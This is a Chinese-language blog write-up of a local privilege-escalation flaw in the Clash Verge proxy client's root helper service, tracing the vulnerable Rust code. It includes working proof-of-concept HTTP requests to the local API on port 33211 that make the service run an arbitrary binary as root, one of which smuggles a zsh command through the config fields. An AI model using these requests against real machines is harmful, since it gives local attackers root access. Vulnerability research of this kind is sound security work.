Q1ngShan's Blog
Clash Verge LPE
Q1ngShan Lv3
  2025-04-27 14:39:50   2025-12-10 08:22:33  

LPE

https://github.com/clash-verge-rev/clash-verge-rev/issues/3428
Clash verge 20250427134648791
通过git issue 可知是clash-verge service 存在LPE

1
clash-verge-service是独立于CVR应用程序之外的进程,给与管理员授权后用于无感拉起其他服务,不会随CVR关闭。当退出CVR后,服务模式进程`clash-verge-service`会继续在后台运行。不会影响系统。

在安装clash-verge时默认会安装一个具有root权限的service来后台调度
Clash verge 20250427140546951

https://github.com/clash-verge-rev/clash-verge-rev/blob/dev/src-tauri/src/core/service.rs
Clash verge 20250427134913718
service在本地开了一个http的服务
Clash verge 20250427140401608
33331 为server服务
33211为service 服务

Clash verge 20250427140636466
可通过api的形式调用一些功能

Clash verge 20250427140723212
Clash verge 20250427141155901
接口start_clash 可以看到其中有配置参数bin_path

Clash verge 20250427141222269
定位到service代码
https://github.com/clash-verge-rev/clash-verge-service/blob/main/src/service/mod.rs
Clash verge 20250427141358178
跟进到
https://github.com/clash-verge-rev/clash-verge-service/blob/main/src/service/core.rs

Clash verge 20250427141518537
最后到test_config_file方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
pub fn test_config_file(&self) -> Result<(), String> {
        let config = match self
            .clash_status
            .inner
            .lock()
            .unwrap()
            .runtime_config
            .lock()
            .unwrap()
            .clone()
        {
            Some(config) => config,
            None => return Err("Runtime config is not set".to_string()),
        };

        let bin_path = config.bin_path.as_str();
        let config_dir = config.config_dir.as_str();
        let config_file = config.config_file.as_str();
        let args = vec!["-d", config_dir, "-f", config_file, "-t"];
......
        let result = process::spawn_process_debug(bin_path, &args)
            .map_err(|e| format!("Failed to execute config test: {}", e))?;
......
        println!("Config test passed successfully");
        Ok(())
    }

spawn_process_debug 方法中直接将调用bin_path拼接固定的参数进行执行命令
Clash verge 20250427141726205

poc

Clash verge 20250427141929191

1
2
3
4
5
6
7
8
9
10
11
12
POST /start_clash HTTP/1.1
Host: 127.0.0.1:33211
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 390

{"core_type":"verge-mihomo","bin_path":"/tmp/cmd","config_dir":"","config_file":"","log_file":""}

Clash verge 20250427142421892
直接以root权限执行
Clash verge 20250427142414740

RCE

命令注入

1
2
3
4
5
6
7
8
9
10
11
12
POST /start_clash HTTP/1.1
Host: 127.0.0.1:33211
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 114

{"core_type":"verge-mihomo","bin_path":"/bin/zsh","config_dir":"-c","config_file":"whoami> /tmp/aa","log_file":""}

Clash verge 20250427164126898